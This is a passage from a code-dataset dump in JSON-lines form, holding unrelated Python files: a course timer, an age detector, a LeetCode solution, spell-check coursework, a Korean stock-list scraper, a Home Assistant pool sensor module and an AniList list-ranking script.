screen first\n    print('\\033c')\n    #program start\n    printCoursesView()\n\n'''\nWalks through the sub-directories and grabs only the .mp4 files mapped to\nthis course directory\n'''\ndef recursiveTimeCounter( directory ):\n    totalTime = 0\n    for subdir, dirs, files in os.walk(directory):\n        for file in files:\n            if( file.lower().endswith(file_extensions) ):\n                totalTime += getTimeInSeconds(dir_path + '\\\\' + subdir + '\\\\' + file , \"mp4\")\n\n    return convertSecondsIntoHMS(totalTime)\n\n'''\nConvert the time from seconds into hours:minutes:seconds format\n'''\ndef convertSecondsIntoHMS( seconds ):\n    seconds, sec = divmod(seconds, 60)\n    hr, min = divmod(seconds, 60)\n    return str( \"%d:%02d:%02d\" % (hr, min, sec) )\n\n'''\nGets the time of the video file \n'''\ndef getTimeInSeconds( filename, type ):\n    if( type == 'mp4' ):\n        return MP4(filename).info.length\n\n\n'''\nPrint the logo screen and the table layout\n'''\ndef printCoursesView( ):\n    #Print the art name Dooglas\n    print(pyfiglet.figlet_format('DOOGLAS') )\n    print(fg.red + '{:#<70}'.format(\"#\") + fg.rs)\n    print(fg.red + '{: ^49}'.format(\"Courses\") + fg.rs,end='')\n    print(fg.red + '|{: ^20}'.format(\"Time\") + fg.rs)\n    print(fg.red + '{:#<70}'.format(\"#\") + fg.rs)\n    items = []\n    for item in os.listdir(dir_path):\n        if not os.path.isfile(os.path.join(dir_path, item)):\n            print( fg.yellow + '{: <43}'.format(\" - \" + item) + fg.rs, end='')\n            print( fg.red + '{: ^13}'.format('|') + fg.rs, end='')\n            print ( fg.green + recursiveTimeCounter(item) + fg.rs )\n\n\n\nif __name__ == \"__main__\":\n    main()","repo_name":"aa-ahmed-aa/Dooglas","sub_path":"dooglas.py","file_name":"dooglas.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"16242616818","text":"import cv2\nimport numpy as np\nimport tensorflow as tf\nimport keras\n\nclass age_detector:\n\n    def __init__(self):\n        self.age_model = tf.keras.models.load_model('models/age_model.h5')\n        self.label_to_age_map = {\n            0: '0-2',\n            1: '4-6',\n            2: '8-13',\n            3: '15-20',\n            4: '25-32',\n            5: '38-43',\n            6: '48-53',\n            7: '60+'\n        }\n\n    def detect_age(self, img_face):\n        try:\n            \"\"\"\n            MODEL_MEAN_VALUES = (78.4263377603, 87.7689143744, 114.895847746)\n            ageList = ['(0-2)', '(4-6)', '(8-12)', '(15-20)', '(25-32)', '(38-43)', '(48-53)', '(60-100)']\n            img_blob = cv2.dnn.blobFromImage(img_face, 1.0, (227,227), MODEL_MEAN_VALUES, swapRB=False)\n            self.age_model.setInput(img_blob)\n            age_class = self.age_model.forward()\n            age = ageList[age_class[0].argmax()]\n            \"\"\"\n            gray = cv2.cvtColor(img_face, cv2.COLOR_BGR2GRAY)\n            resized = cv2.resize(gray, (32, 32))\n            normalized = resized / 255.0\n            reshaped = np.reshape(normalized, (1, 32, 32, 1))\n            result = self.age_model.predict(reshaped)\n            label = np.argmax(result, axis=1)[0]\n            age = self.label_to_age_map[label]\n            return age\n        except Exception as e:\n            print(str(e))\n            return 'UNDETECTED'\n\n\n\n\n","repo_name":"kretmatt/InnovationLab3","sub_path":"utils/age.py","file_name":"age.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"6222138099","text":"# Definition for a binary tree node\n# class TreeNode:\n#     def __init__(self, x):\n#         self.val = x\n#         self.left = None\n#         self.right = None\n#         self.next = None\n\nclass Solution:\n    # @param root, a tree node\n    # @return nothing\n    def dfs(self, node):\n        if node is None:\n            return\n        if node.left is None and node.right is None:\n            
return\n        \n        tmp = node.next\n        got = None\n        while tmp is not None:\n            if tmp.left is not None:\n                got = tmp.left\n                break\n            elif tmp.right is not None:\n                got = tmp.right\n                break\n            tmp = tmp.next\n        \n        if node.left is not None:\n            if node.right is not None:\n                node.left.next = node.right\n                node.right.next = got\n            else:\n                node.left.next = got\n        else:\n            node.right.next = got\n        \n        \n        self.dfs(node.right)\n        self.dfs(node.left)\n        \n    def connect(self, root):\n        self.dfs(root)\n","repo_name":"Shuaiyicao/leetcode-python","sub_path":"117.py","file_name":"117.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"42407189641","text":"## Name: Deepak Vadithala\r\n## Course: MSc Data Science\r\n## Submission Date: 13-Feb-2017\r\n\r\n## Please note: Inline comments explain the reasoning and the logic\r\n## Also, I have written test cases within each function. \r\n## You can uncomment to test these cases. And I have used two helper\r\n## functions instead of repeating the code.\r\n\r\n##================================================================\r\nimport os as os\r\n\r\n\r\n##================================================================\r\ndef isWordCharacter(ch) :\r\n    \r\n    return (ch >= \"A\" and ch <= \"Z\" or ch >= \"a\" and ch <= \"z\")\r\n##================================================================\r\n\r\n\r\n##================================================================\r\ndef getFullLineComments(filename) :\r\n# Please note: This is a helper function which is used as an input\r\n# to other functions. This function returns ONLY full comment lines \r\n    myLineCounter = 0\r\n    myFile = open(filename, 'r')\r\n    myOutputDictionary = {}\r\n\r\n# Loops through each line in the file and looks for only the commented\r\n# lines, and stores the commented lines along with the line number in\r\n# the dictionary\r\n    for myLine in myFile :\r\n        myLineCounter = myLineCounter + 1\r\n        if (myLine.find('#') >= 0) :\r\n            if (myLine.lstrip()[0] == '#') :\r\n                myOutputDictionary[myLineCounter] = myLine.strip()\r\n\r\n    myFile.close()\r\n\r\n    return myOutputDictionary\r\n# print(getFullLineComments('pythoncode.py'))\r\n##================================================================\r\n\r\n\r\n##================================================================\r\ndef countFullLineComments(filename) :\r\n# Using getFullLineComments() which is defined above\r\n    return len(getFullLineComments(filename))\r\n# print(countFullLineComments('pythoncode.py'))\r\n##================================================================\r\n\r\n\r\n##================================================================\r\ndef readInRealWords(filename):\r\n    myInputFile = open(filename, 'r')\r\n    myLoopCounter = 0\r\n    myOutputSet = set()\r\n    myCurrentLine = myInputFile.readline()\r\n\r\n# Looping through each line and storing the iteration number in\r\n# the myLoopCounter variable.
 And myLoopCounter variable's length\r\n# is used to determine the index of the words.\r\n    while myCurrentLine != '':\r\n        myLoopCounter = myLoopCounter + 1\r\n        myOutputSet.add(myCurrentLine[7 + len(str(myLoopCounter)) : ].strip().lower())\r\n        myCurrentLine = myInputFile.readline()\r\n\r\n    myInputFile.close()\r\n    \r\n    return myOutputSet\r\n# print(len(readInRealWords('linenumberwords.txt')))\r\n##================================================================\r\n\r\n\r\n##================================================================\r\ndef getWord(s):\r\n    myInputString = str(s).rstrip()\r\n    myStringIndexList = []\r\n    myLoopCounter = 0\r\n\r\n# Using isWordCharacter() to evaluate each character in the input string \r\n# and isWordCharacter() returns True or False. Storing the index position\r\n# of each character in myStringIndexList and then using min and max\r\n# to get the index position.\r\n\r\n    for myChar in myInputString:\r\n        myLoopCounter = myLoopCounter + 1\r\n        if (isWordCharacter(myChar)):\r\n            myStringIndexList.append(myLoopCounter)\r\n\r\n    if len(myStringIndexList) == 0:\r\n        return ' '\r\n    else:\r\n        return myInputString[min(myStringIndexList) - 1: max(myStringIndexList) ]\r\n\r\n# Some unit test cases. Please uncomment the print statements to test.\r\n\r\n# print(getWord(\" !,Word’s** \"))\r\n# print(getWord(\" !,Word’** \"))\r\n# print(getWord(\" !,’** \"))\r\n# print(getWord(\" !,’** dog'\"\" \\\\'''\"))\r\n##================================================================\r\n\r\n\r\n##================================================================\r\ndef convertLineToWordHelper(inputDictionary, outputFormat) :\r\n\r\n# Helper function which returns dictionary/set based on the outputFormat\r\n# This function is used in Q4 or spellCheckComments()\r\n\r\n    myOutputSet = set()\r\n    myValueKeyPair = {}\r\n    myLowerUpperWordsDict = {}\r\n\r\n    for myKey, myValue in inputDictionary.items():\r\n        for eachWord in myValue.split():\r\n            myOutputSet.add(getWord(eachWord).lower())\r\n            myValueKeyPair[getWord(eachWord).lower()] = myKey\r\n            myLowerUpperWordsDict[getWord(eachWord).lower()] = getWord(eachWord)\r\n        # print(myLowerUpperWordsDict)\r\n\r\n    myOutputSet.remove(' ')\r\n\r\n    if outputFormat == 'set' :\r\n        return myOutputSet\r\n    elif outputFormat == 'valueKey' :\r\n        return myValueKeyPair\r\n    elif outputFormat == 'lowerUpper' :\r\n        return myLowerUpperWordsDict\r\n##================================================================\r\n\r\n\r\n##================================================================\r\ndef spellCheckComments(filename,correctlySpelledWords) :\r\n    # Notes: Instead of repeating the code, I have used functions\r\n    # 1, 2 and 3 along with the helper functions.
\r\n\r\n    myCorrectlySpelledWordSet = correctlySpelledWords\r\n\r\n    # getFullLineComments is a helper function which returns only commented\r\n    # lines from the code\r\n    myCommentWordsDictionary = getFullLineComments(filename)\r\n\r\n    # Converts dictionary values into Set\r\n    myCommentWordSet = convertLineToWordHelper(myCommentWordsDictionary, 'set')\r\n\r\n    # Checking if all comment words are part of correctly spelled words\r\n    # and returns a set of incorrect words\r\n    myIncorrectWords = myCommentWordSet - myCorrectlySpelledWordSet\r\n\r\n    # convertLineToWordHelper() function returns a dictionary where words are keys\r\n    # and the line numbers of the words are the Values\r\n    myValueKeyPairDict = convertLineToWordHelper(myCommentWordsDictionary, 'valueKey')\r\n    myLowerUpperWordsDict = convertLineToWordHelper(myCommentWordsDictionary, 'lowerUpper')\r\n\r\n    # myTempDict returns the line number and the incorrect words as key value pairs\r\n    # myOutput will sort the list elements in ascending order and returns \r\n    myTempDict = {}\r\n    myOutput = {}\r\n\r\n    # Looping through each incorrect word and also checking if the\r\n    # key (line number) already exists in the output dictionary.\r\n    # If the key (line number) exists then we append the value to the existing list\r\n    # If the key (line number) doesn't exist then we create a dictionary element\r\n    for eachWord in myIncorrectWords :\r\n        if(myValueKeyPairDict[(eachWord)] in myTempDict) :\r\n            myTempDict[myValueKeyPairDict[eachWord]].append(myLowerUpperWordsDict[eachWord])\r\n        else :\r\n            myTempDict[myValueKeyPairDict[eachWord]] = sorted([myLowerUpperWordsDict[eachWord]])\r\n\r\n    for myKey, myValue in myTempDict.items():\r\n        myOutput[myKey] = sorted(myValue)\r\n        # print(sorted(myValue))\r\n\r\n    return myOutput\r\n# print(spellCheckComments('pythoncode.py', readInRealWords('linenumberwords.txt')))\r\n\r\n##================================================================\r\n\r\n\r\n##================================================================\r\ndef RobustSpellCheck(filenamePy,filenameWords):\r\n    if(os.path.isfile(filenamePy) and os.path.isfile(filenameWords)) :\r\n        return [0, spellCheckComments(filenamePy, readInRealWords(filenameWords))]\r\n    elif(os.path.isfile(filenamePy)) :\r\n        print('Could not successfully read in word list')\r\n        return [1, {}]\r\n    elif(os.path.isfile(filenameWords)) :\r\n        print('Could not successfully spell check the selected file')\r\n        return [2, {}]\r\n    else : # neither file exists\r\n        print('Could not successfully check both the files')\r\n        return [3, {}]\r\n\r\n## Unit test cases covering all the scenarios\r\n# print(RobustSpellCheck('pythoncode.py','linenumberwords.txt')) # Both the files are available\r\n# print(RobustSpellCheck('pythoncode.py','linenumber----.txt')) # Word file is missing\r\n# print(RobustSpellCheck('pythons.pys','linenumberwords.txt')) # Python file is missing\r\n# print(RobustSpellCheck(' ','li nusdfsdfs.txts')) # Both the files are missing\r\n##================================================================\r\n\r\n\r\n##================================================================\r\ndef getCommentsHelper(inputString, quoteType) :\r\n# This function accepts both single and double quotes as the second parameter\r\n# Logic: Function finds the single/double quote pairs and \r\n# then replaces the quotes with (|) characters.
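 For example, the quoted span\r\n# \"a#b\" (5 characters including its quotes) is masked to |||||, so any '#' still\r\n# visible afterwards must begin a real comment.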
\r\n# This way we will find the real comment's start position.\r\n\r\n    myInputString = inputString\r\n    myQuoteType = quoteType\r\n    myTotalIterations = int(myInputString.count(myQuoteType) / 2)\r\n\r\n    for eachIteration in range(1, myTotalIterations + 1, 1) :\r\n        myInputSubStringStartPos = myInputString.find(myQuoteType)\r\n        myInputSubStringEndPos = myInputString.find(myQuoteType, myInputString.find(myQuoteType) + 1 ) + 1\r\n        myInputStringLen = len(myInputString[myInputSubStringStartPos : myInputSubStringEndPos])\r\n        myInputString = myInputString.replace(myInputString[myInputSubStringStartPos : myInputSubStringEndPos] , '|' * myInputStringLen, 1)\r\n\r\n    if(myInputString.count('#') == 0) :\r\n        return ''\r\n    else :\r\n        return inputString[myInputString.find('#') : ]\r\n##================================================================ \r\n\r\n\r\n##================================================================\r\ndef ExtractComment(s):\r\n    return getCommentsHelper(s, '\"')\r\n##================================================================ \r\n\r\n\r\n##================================================================\r\ndef ExtractCommentAdvanced(s): \r\n    if(s.count('\"')) > 0 :\r\n        myOutputString = getCommentsHelper(s, '\"')\r\n    elif(s.count(\"'\")) > 0 :\r\n        myOutputString = getCommentsHelper(s, \"'\")\r\n    elif(s.count('\"') + s.count(\"'\")) == 0 and s.count('#') > 0 :\r\n        return s.strip()\r\n    elif(s.count('\"') + s.count(\"'\")) == 0 and s.count('#') == 0 :\r\n        return '' \r\n    return myOutputString\r\n\r\n# Some unit test cases with single, double and no quotes. \r\n# These test cases also include cases where we have some extra spaces.\r\n# Please uncomment below print statements to execute the test cases.\r\n\r\n# print(ExtractCommentAdvanced('    outf.write(\"/# \" + str(number) + \" #/ \" + line) #lots of hash(#) symbols here'))\r\n# print(ExtractCommentAdvanced(\"    outf.write('/# ' + str(number) + ' #/ ' + line) #lots of hash(#) symbols here\"))\r\n# print(ExtractCommentAdvanced(\"     #lots of hash(#) symbols here\"))\r\n# print(ExtractCommentAdvanced(\" '' ''    #lots of hash(#) symbols here\"))\r\n# print(ExtractCommentAdvanced('     #lots of hash(#) symbols here'))\r\n# print(ExtractCommentAdvanced('    outf.write(str(number) + line'))\r\n##================================================================\r\n","repo_name":"iamdv/bbk-msc-ds-isd","sub_path":"Term2-Coursework1/term2cw1.py","file_name":"term2cw1.py","file_ext":"py","file_size_in_byte":10373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"20103409729","text":"# -*- coding: utf-8 -*-\n# date : 2020/05/23\n# Save the daily candles (day bong) of every currently listed stock to a json file\n# by crawling the Naver finance page below\n# https://finance.naver.com/sise/sise_market_sum.nhn\n#\n# The column set cannot be changed; the page is saved in its initial state as-is\n# \n# There are many stocks, so the listing is split into pages;
 the trailing page\n# number is incremented to keep fetching\n# https://finance.naver.com/sise/sise_market_sum.nhn?&page=1\n# https://finance.naver.com/sise/sise_market_sum.nhn?&page=2\n#\n# Output files\n# kosdaq stocks : YYYYMMDD_kosdaq_day_bong_list.txt\n# kospi stocks : YYYYMMDD_kospi_day_bong_list.txt\n#\n\nimport time\nimport urllib.request\nimport json\nfrom bs4 import BeautifulSoup\n\n\ndef load_json_from_file(file_name) :\n    try :\n        with open(file_name,'r',encoding=\"cp949\") as make_file: \n            data=json.load(make_file) \n            make_file.close()\n    except Exception as e : # or simply: except : \n        data = {}\n        print(e, file_name)\n    return data\n\ndef save_to_file_json(file_name, data) :\n    with open(file_name,'w',encoding=\"cp949\") as make_file: \n        json.dump(data, make_file, ensure_ascii=False, indent=\"\\t\") \n        make_file.close()\n\nTODAY = time.strftime(\"%Y%m%d\")\n\n# extract the stock rows found at the given url\ndef get_stock_list(url, cnt) :\n    title_list = []\n    with urllib.request.urlopen(url) as fs :\n        soup = BeautifulSoup(fs.read().decode(fs.headers.get_content_charset()), 'html.parser')\n\n    prices =[]\n    got_title = 0\n\n    # each data row starts with a tr tag\n    for tr in soup.find_all('tr') :\n        # the header (title) row uses th tags\n        if got_title == 0 :\n            th_list = tr.find_all('th')\n            if th_list != [] :\n                if th_list[0].text.strip() == 'N' :\n                    info = {}\n                    for i in range(0,len(th_list)) :\n                        data = th_list[i].text.strip()\n                        title_list.append(data)\n                        print(i, data )\n                    print('')\n                    got_title = 1\n        # each field is a td tag\n        td_list = tr.find_all('td')\n        try : \n            no = td_list[0].text.strip()\n            if no[0] == '\\n' :\n                no = no.replace('\\n','')\n            # Some rows are blank lines or separators rather than data.\n            # Luckily the N column counts up from 1, so a row is accepted as\n            # valid data only when that value matches the running counter\n            if int(no) == cnt :\n                info = {}\n                for i in range(0,len(td_list)) :\n                    data = td_list[i].text.strip()\n                    info[title_list[i]] = data\n                if info['name'] == '2' : # ignore the page navigation row at the bottom\n                    continue\n                prices.append(info)\n                cnt+=1\n        except :\n            continue\n    return prices, cnt\n\ndef day_bong_list(name) :\n    # kospi\n    url1 = 'https://finance.naver.com/sise/sise_market_sum.nhn?sosok=0'\n    # kosdaq\n    url2 = 'https://finance.naver.com/sise/sise_market_sum.nhn?sosok=1'\n    close_price_list = {'kospi':url1, 'kosdaq':url2}\n\n    # total page counts; these may grow as more stocks are listed\n    close_page_list = {'kospi':32, 'kosdaq':29}\n\n    cnt = 1\n    prices = []\n    for i in range(0, close_page_list[name]) :\n        print('page ', i+1)\n        url = close_price_list[name] + '&page='+str(i+1)\n        ret, cnt = get_stock_list(url, cnt) \n        prices += ret\n\n    # save\n    fname = TODAY+'_'+name+'_day_bong_list.txt'\n    save_to_file_json(fname, prices)\n    print('done ', name)\n\nprint('start saving daily candles for all kosdaq stocks')\nday_bong_list('kosdaq')\n\nprint('start saving daily candles for all kospi stocks')\nday_bong_list('kospi')\n\n\n\n# test that the file was saved correctly\nif 0 :\n    fname = TODAY+'_kosdaq'+'_day_bong_list.txt'\n    prices = load_json_from_file(fname)\n    for p in prices :\n        print(p)\n","repo_name":"multizone-quant/system-trading","sub_path":"day-bong-list.py","file_name":"day-bong-list.py","file_ext":"py","file_size_in_byte":3990,"program_lang":"python","lang":"ko","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"}
{"seq_id":"5999379198","text":"import sys\nimport logging\nfrom tandem.shared.io.base import InterfaceDataBase, InterfaceBase\n\n\nclass STDData(InterfaceDataBase):\n    pass\n\n\nclass STDStreams(InterfaceBase):\n    data_class = STDData\n\n    def __init__(self, handler_function):\n        super(STDStreams, self).__init__(handler_function)\n\n    def stop(self):\n        super(STDStreams, self).stop()\n        sys.stdout.close()\n\n    def write_io_data(self, *args, **kwargs):\n        io_data, = args\n\n        sys.stdout.write(io_data.get_data())\n
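        # newline-terminate the payload and flush so the reading process sees each message immediately\n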
sys.stdout.write(\"\\n\")\n sys.stdout.flush()\n\n def _read_data(self):\n try:\n for line in sys.stdin:\n self._received_data(line)\n except:\n logging.exception(\"Exception when reading from stdin:\")\n raise\n","repo_name":"typeintandem/tandem","sub_path":"agent/tandem/agent/io/std_streams.py","file_name":"std_streams.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":697,"dataset":"github-code","pt":"53"} +{"seq_id":"72685462248","text":"class Solution(object):\n def isPowerOfFour(self, num):\n \"\"\"\n :type num: int\n :rtype: bool\n \"\"\"\n \"\"\"\n 将整数转换为二进制数,若整数是4的指数,则满足:\n 1.最高位为1,其余位为0(num & (num) ==0)\n 2.0的个数为偶数(num & 0x55555555 > 1)\n \"\"\"\n return num & (num-1) ==0 and num & 0x55555555 > 0\n\n\n\nSolution1 = Solution()\nnum = 64\nprint(Solution1.isPowerOfFour(num))","repo_name":"zazaliu/leetcode-python","sub_path":"342. Power of Four.py","file_name":"342. Power of Four.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36232897205","text":"\"\"\"Platform for sensor integration.\"\"\"\nfrom __future__ import annotations\n\nfrom typing import Any\n\nfrom homeassistant.helpers.entity import EntityCategory\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.helpers.entity_platform import AddEntitiesCallback\nfrom homeassistant.core import HomeAssistant\n\nfrom .entity import PoolEquipmentEntity, NjsPCHAdata\n\nfrom homeassistant.components.sensor import SensorEntity\n\nfrom .chemistry import (\n ChemistryDemandSensor,\n ChemistrySensor,\n ChemistryTankLevel,\n ChemistryDosingStatus,\n SaltSensor,\n SaltRequiredSensor,\n SaltTargetSensor,\n CurrentOutputSensor,\n TargetOutputSensor,\n SaturationIndexSensor,\n)\nfrom .pumps import PumpPowerSensor, PumpFlowSensor, PumpSpeedSensor, PumpProgramSensor\nfrom .controller import PanelModeSensor, TempProbeSensor\nfrom .bodies import BodyTempSensor, FilterPressureSensor, FilterCleanSensor, BodyCoveredSensor\nfrom .const import (\n PoolEquipmentClass,\n PoolEquipmentModel,\n CURRENT_OUTPUT,\n DESC,\n DOMAIN,\n EVENT_AVAILABILITY,\n EVENT_CHLORINATOR,\n EVENT_PUMP,\n SALT_LEVEL,\n SALT_REQUIRED,\n SALT_TARGET,\n STATUS,\n TARGET_OUTPUT,\n)\n\n\nasync def async_setup_entry(\n hass: HomeAssistant,\n config_entry: ConfigEntry,\n async_add_entities: AddEntitiesCallback,\n) -> None:\n \"\"\"Add sensors for past config_entry in HA.\"\"\"\n coordinator = hass.data[DOMAIN][config_entry.entry_id]\n\n new_devices = []\n config = coordinator.api.get_config()\n\n new_devices.append(PanelModeSensor(coordinator, config))\n if \"temps\" in config:\n units = \"F\"\n if \"units\" in config[\"temps\"]:\n units = config[\"temps\"][\"units\"][\"name\"]\n for key in config[\"temps\"]:\n if (\n key == \"air\"\n or key == \"solar\"\n or key.startswith(\"solarSensor\")\n or key.startswith(\"waterSensor\")\n ):\n new_devices.append(\n TempProbeSensor(\n coordinator=coordinator,\n key=key,\n units=units,\n )\n )\n if (\n \"bodies\" in config[\"temps\"]\n ): # We can have Nobody Nixie systems (equipment only)\n for body in list(config[\"temps\"][\"bodies\"]):\n if \"temp\" in body:\n new_devices.append(\n BodyTempSensor(coordinator=coordinator, units=units, body=body)\n )\n\n for pump in config[\"pumps\"]:\n # Pump sensors vary by type. This may need a re-visit for pump types that use a\n # number for their speed or High/Low. 
Such are the dual speed, superflo, and relay pumps\n if \"type\" in pump:\n pump_type = pump[\"type\"]\n if \"maxSpeed\" in pump_type:\n new_devices.append(PumpSpeedSensor(coordinator=coordinator, pump=pump))\n if \"maxFlow\" in pump_type:\n new_devices.append(PumpFlowSensor(coordinator=coordinator, pump=pump))\n if \"relays\" in pump_type:\n new_devices.append(PumpProgramSensor(coordinator=coordinator, pump=pump))\n\n if \"maxSpeed\" in pump_type or \"maxFlow\" in pump_type:\n new_devices.append(PumpPowerSensor(coordinator=coordinator, pump=pump))\n if STATUS in pump:\n new_devices.append(\n EquipmentStatusSensor(\n coordinator=coordinator,\n equipment_class=PoolEquipmentClass.PUMP,\n equipment_model=PoolEquipmentModel.PUMP,\n equipment=pump,\n event=EVENT_PUMP,\n )\n )\n for chlorinator in config[\"chlorinators\"]:\n if SALT_LEVEL in chlorinator:\n new_devices.append(\n SaltSensor(coordinator=coordinator, chlorinator=chlorinator)\n )\n if CURRENT_OUTPUT in chlorinator:\n new_devices.append(\n CurrentOutputSensor(coordinator=coordinator, chlorinator=chlorinator)\n )\n if TARGET_OUTPUT in chlorinator:\n new_devices.append(\n TargetOutputSensor(coordinator=coordinator, chlorinator=chlorinator)\n )\n if SALT_REQUIRED in chlorinator:\n new_devices.append(\n SaltRequiredSensor(coordinator=coordinator, chlorinator=chlorinator)\n )\n if SALT_TARGET in chlorinator:\n new_devices.append(\n SaltTargetSensor(coordinator=coordinator, chlorinator=chlorinator)\n )\n if STATUS in chlorinator:\n new_devices.append(\n EquipmentStatusSensor(\n coordinator=coordinator,\n equipment_class=PoolEquipmentClass.CHLORINATOR,\n equipment_model=PoolEquipmentModel.CHLORINATOR,\n equipment=chlorinator,\n event=EVENT_CHLORINATOR,\n )\n )\n for chem_controller in config[\"chemControllers\"]:\n if (\n \"name\" in chem_controller\n and \"type\" in chem_controller\n and \"name\" in chem_controller[\"type\"]\n and chem_controller[\"type\"][\"name\"] != \"none\"\n ):\n if \"ph\" in chem_controller:\n chemical = chem_controller[\"ph\"]\n new_devices.append(\n ChemistrySensor(\n coordinator=coordinator,\n chem_controller=chem_controller,\n chemical=chemical,\n )\n )\n new_devices.append(\n ChemistryDemandSensor(\n coordinator=coordinator,\n chem_controller=chem_controller,\n chemical=chemical,\n )\n )\n \n if chemical[\"enabled\"] is True:\n new_devices.append(\n ChemistryDosingStatus(\n coordinator=coordinator,\n chem_controller=chem_controller,\n chemical=chemical,\n )\n )\n if \"tank\" in chemical and \"capacity\" in chemical[\"tank\"] and chemical[\"tank\"][\"capacity\"] > 0:\n new_devices.append(\n ChemistryTankLevel(\n coordinator=coordinator,\n chem_controller=chem_controller,\n chemical=chemical,\n )\n )\n\n if \"orp\" in chem_controller:\n chemical = chem_controller[\"orp\"]\n new_devices.append(\n ChemistrySensor(\n coordinator=coordinator,\n chem_controller=chem_controller,\n chemical=chem_controller[\"orp\"],\n )\n )\n new_devices.append(\n ChemistryDemandSensor(\n coordinator=coordinator,\n chem_controller=chem_controller,\n chemical=chemical,\n )\n )\n\n if chemical[\"enabled\"] is True:\n new_devices.append(\n ChemistryDosingStatus(\n coordinator=coordinator,\n chem_controller=chem_controller,\n chemical=chemical,\n )\n )\n if (\n \"tank\" in chemical\n and chemical[\"doserType\"][\"name\"] != \"chlorinator\"\n and \"capacity\" in chemical[\"tank\"] and chemical[\"tank\"][\"capacity\"] > 0\n ):\n new_devices.append(\n ChemistryTankLevel(\n coordinator=coordinator,\n chem_controller=chem_controller,\n 
chemical=chemical,\n )\n )\n new_devices.append(\n SaturationIndexSensor(\n coordinator=coordinator,\n chem_controller=chem_controller,\n index_name=\"lsi\",\n )\n )\n new_devices.append(\n SaturationIndexSensor(\n coordinator=coordinator,\n chem_controller=chem_controller,\n index_name=\"csi\",\n )\n )\n for pool_filter in config[\"filters\"]:\n new_devices.append(\n FilterPressureSensor(coordinator=coordinator, pool_filter=pool_filter)\n )\n new_devices.append(\n FilterCleanSensor(coordinator=coordinator, pool_filter=pool_filter)\n )\n\n if new_devices:\n async_add_entities(new_devices)\n\n\nclass EquipmentStatusSensor(PoolEquipmentEntity, SensorEntity):\n \"\"\"Equipment Status Sensor for njsPC-HA\"\"\"\n\n def __init__(\n self,\n coordinator: NjsPCHAdata,\n equipment_class: PoolEquipmentClass,\n equipment_model: PoolEquipmentModel,\n equipment: Any,\n event: str,\n ) -> None:\n \"\"\"Initialize the sensor.\"\"\"\n super().__init__(\n coordinator=coordinator,\n equipment_class=equipment_class,\n data=equipment,\n )\n if STATUS in equipment and DESC in equipment[STATUS]:\n self._value = equipment[STATUS][DESC]\n self._event = event\n self._available = True\n # Below makes sure we have a name that makes sense for the entity.\n self._attr_device_class = f\"{self.equipment_name}_status\"\n self._attr_entity_category = EntityCategory.DIAGNOSTIC\n\n def _handle_coordinator_update(self) -> None:\n \"\"\"Handle updated data from the coordinator.\"\"\"\n if (\n self.coordinator.data[\"event\"] == self._event\n and self.coordinator.data[\"id\"] == self.equipment_id\n ):\n if (\n STATUS in self.coordinator.data\n and DESC in self.coordinator.data[STATUS]\n ):\n self._value = self.coordinator.data[STATUS][DESC]\n self.async_write_ha_state()\n elif self.coordinator.data[\"event\"] == EVENT_AVAILABILITY:\n self._available = self.coordinator.data[\"available\"]\n self.async_write_ha_state()\n\n @property\n def should_poll(self) -> bool:\n return False\n\n @property\n def available(self) -> bool:\n return self._available\n\n @property\n def name(self) -> str:\n \"\"\"Name of the sensor\"\"\"\n return \"Status\"\n\n @property\n def unique_id(self) -> str:\n \"\"\"ID of the sensor\"\"\"\n return f\"{self.coordinator.controller_id}_{self.equipment_class}_{self.equipment_id}_status\"\n\n @property\n def native_value(self) -> str | None:\n return self._value\n\n @property\n def icon(self) -> str:\n if self._value != \"Ok\":\n return \"mdi:alert-circle\"\n return \"mdi:check-circle\"\n","repo_name":"Crewski/njsPC-HA","sub_path":"custom_components/njspc_ha/sensor.py","file_name":"sensor.py","file_ext":"py","file_size_in_byte":11348,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"17441014509","text":"import requests\r\nimport json\r\nimport random\r\n\r\n # to-do-list:\r\n # variables for type and status, not needed for now\r\n # if 404 error on username, return error and reprompt\r\n # add error checking everywhere\r\n # implement a different comparison method\r\n # allow the user to skip an entry and come back to it later\r\n # bubble method sort will pin the same anime against each other multiple times, want to avoid this\r\n # divide parts of code into separate, distinct functions\r\n # deploy as webapp with django\r\n # save iterations by default sorting by anilist rating\r\n # sort initial array by average score\r\n\r\ndef main():\r\n #-------------------------------------------------------------------------------------------#\r\n 
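# Query the AniList GraphQL endpoint (https://graphql.anilist.co) for the user's\r\n    # completed list, pulling each title (english/romaji) and its averageScore.\r\n    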
anilistUsername = input(\"Enter your AniList username: \")\r\n query = \"\"\"\r\n query($userName: String) {\r\n MediaListCollection(userName: $userName, type: ANIME, status: COMPLETED) {\r\n lists {\r\n entries {\r\n media {\r\n title {\r\n romaji\r\n english\r\n }\r\n averageScore\r\n }\r\n }\r\n }\r\n }\r\n }\r\n \"\"\"\r\n variables = {\r\n \"userName\": anilistUsername,\r\n \"type\": \"ANIME\",\r\n \"status\": \"REPEATING\"\r\n }\r\n url = \"https://graphql.anilist.co\"\r\n response = requests.post(url, json={\"query\": query, \"variables\": variables}) # HTTP request to server\r\n if response.status_code == 200:\r\n test_data_types(response)\r\n else:\r\n raise Exception(f\"Error: {response.status_code}\")\r\n\r\ndef test_data_types(response):\r\n\r\n userAnimeList = []\r\n userAnimeListScores = []\r\n\r\n if response.status_code == 200:\r\n\r\n animeListJson = json.dumps(response.json()) # convert requests.models.Response to str\r\n animeList = json.loads(animeListJson) # convert str to dict\r\n animeListData = animeList[\"data\"][\"MediaListCollection\"][\"lists\"]\r\n\r\n for data in animeListData:\r\n entries = data[\"entries\"]\r\n # if English exists, add the English title, else add the romaji title\r\n for entry in entries:\r\n # append anime scores to different array\r\n animeTitleScore = 